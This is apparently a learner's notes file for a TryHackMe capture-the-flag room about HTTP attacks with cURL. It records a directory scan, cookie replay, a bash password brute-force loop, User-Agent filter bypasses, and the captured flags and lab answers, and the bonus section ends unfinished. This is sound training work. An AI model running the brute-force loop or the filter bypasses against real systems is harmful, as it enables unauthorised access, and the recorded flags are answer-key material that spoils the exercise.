2025-12-24 20:58:07 EST -- START TIME
# Day24 (Exploitation with cURL: Hoperation Eggsploit
--------------------------------------


|================================================================
- Name: 
- IP Address: 10.67.147.80
- OS: 
- Notes: 

//CREDS:
	#post.php (admin:admin)

//Flags:
	//THM{curl_post_success}
	//THM{session_cookie_master}
	//THM{user_agent_filter_bypassed}

|================================================================
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

## Introduction
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
//According to blue-team intel, the wormhole is held open by a control panel on the Evil Bunnies' web server. The team must shut it down first to cut off reinforcements before facing King Malhare.

//However, the terminal they have is bare. No Burp Suite, no browser, just a command prompt.

//But that's fine. The team will use the command line and cURL to speak HTTP directly: send requests, read responses, and find the endpoints that shut the portal.

### Learning Objectives
	-Understand what HTTP requests and responses are at a high level.
	-Use cURL to make basic requests (using GET) and view raw responses in the terminal.
	-Send POST requests with cURL to submit data to endpoints.
	-Work with cookies and sessions in cURL to maintain login state across requests.

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


## Web Hacking Using cURL
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
### HTTP Requests Using cURL
//Applications, like our browsers, communicate with servers using HTTP (Hypertext Transfer Protocol). Think of HTTP as the language for asking a server for resources (pages, images, JSON data) and getting answers back.

//So if you want to access a website, your browser sends an HTTP request to the web server. If the request is valid, the server replies with an HTTP response that contains the data needed to display the website.

//In the absence of a browser, you can still speak HTTP directly from the command line. The simplest way is with cURL.

//curl is a command-line tool for crafting HTTP requests and viewing raw responses. It's ideal when you need precision or when GUI tools aren't available.

### Trying out cURL
//Once you have AttackBox ready. Open a command prompt and run the command below:

2025-12-24 21:09:50 EST -- 
curl -ik http://10.67.147.80
HTTP/1.1 200 OK
Date: Thu, 25 Dec 2025 02:09:07 GMT
Server: Apache/2.4.52 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 77
Content-Type: text/html; charset=UTF-8

Welcome to the cURL practice server!
Try sending a POST request to /post.php

//What happens after running the command is that curl sends an HTTP GET request for the site's home page. An HTTP response is received containing the body, which is then printed in the terminal. Because this is a terminal, instead of rendering the webpage, what you'll see is the text representation of the page in HTML.

### Sending POST Requests
//Suppose you've found a login form whose POST target is /post.php. When you log in through a browser, it sends a POST request to the server containing the credentials you entered. We can simulate this directly from the terminal.

//First need to get how to set up POST request

2025-12-24 21:13:44 EST -- 
curl -ik http://10.67.147.80/post.php
HTTP/1.1 200 OK
Date: Thu, 25 Dec 2025 02:13:17 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 50
Content-Type: text/html; charset=UTF-8

Send POST data like username=admin&password=admin

//A normal login form submission might look like this:

2025-12-24 21:15:27 EST -- 
curl -X POST -d "username=admin&password=admin" http://10.67.147.80/post.php

Login successful!
Flag: THM{curl_post_success}

//THM{curl_post_success}

//Here's what's happening:

	-X POST tells cURL to use the POST method.
	-d defines the data we're sending in the body of the request.
	-The data will be sent in URL-encoded format, which is the same as what HTML forms use.

//If the application expects additional fields, like a "Login" button or a CSRF token, they can be included too:

2025-12-24 21:19:41 EST -- 
curl -X POST -d "username=admin&password=admin&submit=Login" http://10.67.147.80/post.php

Login successful!
Flag: THM{curl_post_success}

//To view exactly what the server returns (including headers and potential redirects), add the -i flag:

2025-12-24 21:21:59 EST -- 
curl -i -X POST -d "username=admin&password=admin&submit=Login" http://10.67.147.80/post.php
HTTP/1.1 200 OK
Date: Thu, 25 Dec 2025 02:21:36 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 47
Content-Type: text/html; charset=UTF-8

Login successful!
Flag: THM{curl_post_success}

//If the site responds with a Set-Cookie header, that's a good sign, it means you've successfully logged in or at least triggered a session.

-- feroxbuster --
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

2025-12-24 21:49:14 EST -- 
feroxbuster -k -u http://10.67.147.80 -a curl/8.17.0 -w /usr/share/dirb/wordlists/big.txt --scan-limit 2 -x php,txt,html,htm,aspx -o feroxbuster.out

200      GET         http://10.67.147.80/
403      GET         http://10.67.147.80/agent.php
200      GET         http://10.67.147.80/cookie.php
200      GET         http://10.67.147.80/index.php
200      GET         http://10.67.147.80/post.php
200      GET         http://10.67.147.80/session.php
200      GET         http://10.67.147.80/terminal.php


>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

---

### Using Cookies and Sessions
//Once you log in, web applications use cookies to keep your session active. When you make another request with your browser, the cookie gets sent automatically, but with cURL, you need to handle it yourself.

//You can do this in two steps:

//Step 1: Save the cookies:
2025-12-24 21:25:33 EST -- 
curl -c cookies.txt -d "username=admin&password=admin" http://10.67.147.80/session.php

	-The -c option writes any cookies received from the server into a file (cookies.txt in this case).
	-You'll often see a session cookie like PHPSESSID=xyz123.

2025-12-24 22:12:32 EST -- 
cat cookies.txt    
# Netscape HTTP Cookie File
# https://curl.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.

10.67.147.80    FALSE   /       FALSE   0       PHPSESSID       j5fokja3g8ivai92gp0ranfr1k

//Step 2: Reuse the saved cookies
2025-12-24 22:16:56 EST -- 
curl -i -b cookies.txt http://10.67.147.80/session.php

	-The -b option tells cURL to send the saved cookies in the next request, just like a browser would.

//This is exactly how session replay testing works, by replaying valid cookies in separate requests.

### Automating Login and Performing Brute Force Using cURL
//Now that we can send POST requests and manage sessions, it's time to automate things. Let's simulate a brute-force attack against a weak login form.

//Start by creating a file called passwords.txt and place the following passwords inside it:

admin123
password
letmein
secretpass
secret

//Then, create a simple bash loop called loop.sh to try each password against bruteforce.php and copy-paste the following code inside it:

#!/bin/env bash
for pass in $(cat passwords.txt); do
  echo "Trying password: $pass"
  response=$(curl -s -X POST -d "username=admin&password=$pass" http://10.67.147.80/bruteforce.php)
  if echo "$response" | grep -q "Welcome"; then
    echo "[+] Password found: $pass"
    break
  fi
done

2025-12-24 22:23:06 EST -- 
chmod +x loop.sh

2025-12-24 22:23:19 EST -- 
./loop.sh 
Trying password: admin123
Trying password: password
Trying password: letmein
Trying password: secretpass
[+] Password found: secretpass

//Here's how this works:

	-$(cat passwords.txt) reads each password from the file.
	-curl -s sends the login request silently (no progress meter).
	-The response is stored in a variable.
	-grep -q checks if the response contains a success string (like “Welcome”).
	-When found, it prints the working password and exits the loop.

//This exact method underpins tools like Hydra, Burp Intruder, and WFuzz. By doing it manually, you understand what's happening under the hood: a repetitive HTTP POST with variable data, waiting for a different response.

---

### Bypassing User-Agent Checks
//Some applications block cURL by checking the User-Agent header. For example, the server may reject requests with: User-Agent: curl/7.x.x

//To specify a custom user-agent, we can use the -A flag:

2025-12-24 22:26:14 EST -- 
curl -A "internalcomputer" http://10.67.147.80/ua_check.php
Welcome Internal Computer!

//To confirm the check:

2025-12-24 22:27:26 EST -- 
curl -i http://10.67.147.80/ua_check.php

HTTP/1.1 403 Forbidden
Date: Thu, 25 Dec 2025 03:27:31 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 55
Content-Type: text/html; charset=UTF-8

Blocked: Only internalcomputer useragents are allowed.

2025-12-24 22:28:31 EST -- 
curl -i -A "internalcomputer" http://10.67.147.80/ua_check.php

HTTP/1.1 200 OK
Date: Thu, 25 Dec 2025 03:28:37 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 27
Content-Type: text/html; charset=UTF-8

Welcome Internal Computer!

//If the first fails and the second succeeds, the UA check is working, and you've bypassed it by spoofing.

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


// *QUESTIONS* //
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
1. Make a POST request to the /post.php endpoint with the username admin and the password admin. What is the flag you receive?

2025-12-24 22:32:44 EST -- 
curl -X POST -d "username=admin&password=admin" http://10.67.147.80/post.php

Login successful!
Flag: THM{curl_post_success}
	//THM{curl_post_success}

2. Make a request to the /cookie.php endpoint with the username admin and the password admin and save the cookie. Reuse that saved cookie at the same endpoint. What is the flag your receive?

2025-12-24 22:38:53 EST -- 
curl -ik -c cookies.txt -d "username=admin&password=admin" http://10.67.147.80/cookie.php

Login successful. Cookie set.

2025-12-24 22:41:50 EST -- 
curl -ik -b cookies.txt http://10.67.147.80/cookie.php

Welcome back, admin!
Flag: THM{session_cookie_master}
	//THM{session_cookie_master}

3. After doing the brute force on the /bruteforce.php endpoint, what is the password of the admin user?

2025-12-24 22:45:20 EST -- 
./loop.sh
Trying password: admin123
Trying password: password
Trying password: letmein
Trying password: secretpass
[+] Password found: secretpass

	//secretpass

4. Make a request to the /agent.php endpoint with the user-agent TBFC. What is the flag your receive?

2025-12-24 22:47:11 EST -- 
curl -i -A "TBFC" http://10.67.147.80/agent.php

Flag: THM{user_agent_filter_bypassed}
	//THM{user_agent_filter_bypassed}

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>



// *BONUS MISSION*//
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

//This section is optional and applies only to the final bonus question. The instructions in this section do not apply to the regular questions. Feel free to skip it and proceed with the regular questions if you don’t intend to attempt it.

//Before the final battle can begin, the wormhole must be closed to stop enemy reinforcements. The evil Easter bunnies operate a web control panel that holds it open. The blue team must identify endpoints, authenticate and obtain the operator token, and call the close operation.

Hint: Use rockyou.txt when brute forcing for the password (only for the bonus mission). The PIN is between 4000 and 5000.

Server: http://10.67.147.80/terminal.php?action=panel

2025-12-24 22:53:23 EST -- 
curl -i http://10.67.147.80/terminal.php?action=panel

<h2>Access denied</h2><p>This admin panel is terminal-only and is only accessible using secretcomputer</p> 

2025-12-24 22:55:25 EST -- 
curl -i -A "secretcomputer" http://10.67.147.80/terminal.php?action=panel

{
    "service": "Wormhole Control Panel",
    "endpoints": {
        "\/terminal.php?action=info": "Public info",
        "\/terminal.php?action=login": "POST: username,password",
        "\/terminal.php?action=pin": "POST: attempt PIN to get temporary admin token",
        "\/terminal.php?action=status": "GET: wormhole status",
        "\/terminal.php?action=close": "POST: close wormhole"
    },
    "note": "This panel only answers to terminal user agents. Use the endpoints to fully close the wormhole."
}

2025-12-24 22:57:53 EST -- 
curl -i -A "secretcomputer" http://10.67.147.80/terminal.php?action=info
{
    "title": "Bunny Control Panel",
    "desc": "The rabbits hide the wormhole state and protect closure behind both a session and a token. You will need to authenticate and obtain the operator token."
}

// Intial
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

2025-12-24 22:59:02 EST -- 
curl -i -A "secretcomputer" http://10.67.147.80/terminal.php?action=login
{
    "error": "POST username & password required."
}

2025-12-24 22:59:53 EST -- 
curl -i -A "secretcomputer" http://10.67.147.80/terminal.php?action=pin
{
    "error": "POST pin required. ex: curl -X POST -d \"pin=1234\" ..."
}

2025-12-24 23:00:44 EST -- 
curl -i -A "secretcomputer" http://10.67.147.80/terminal.php?action=status
{
    "wormhole": "OPEN",
    "note": "Admin information hidden. Authenticate and obtain operator token."
}

2025-12-24 23:02:04 EST -- 
curl -i -A "secretcomputer" http://10.67.147.80/terminal.php?action=close
{
    "error": "POST required to close wormhole."
}

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

## Required Execution Order (Do NOT deviate)
login  →  pin  →  token  →  close

// Login Action
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

curl -i -A "secretcomputer" -c cookies_bonus.txt "http://10.67.147.80/terminal.php?action=panel"


## Test Response
curl -i -A "secretcomputer" -c cookies_bouns.txt -d "username=admin&password=admin" http://10.67.147.80/terminal.php?action=login

{
    "status": "fail",
    "msg": "Invalid credentials."
}


>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>



>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>



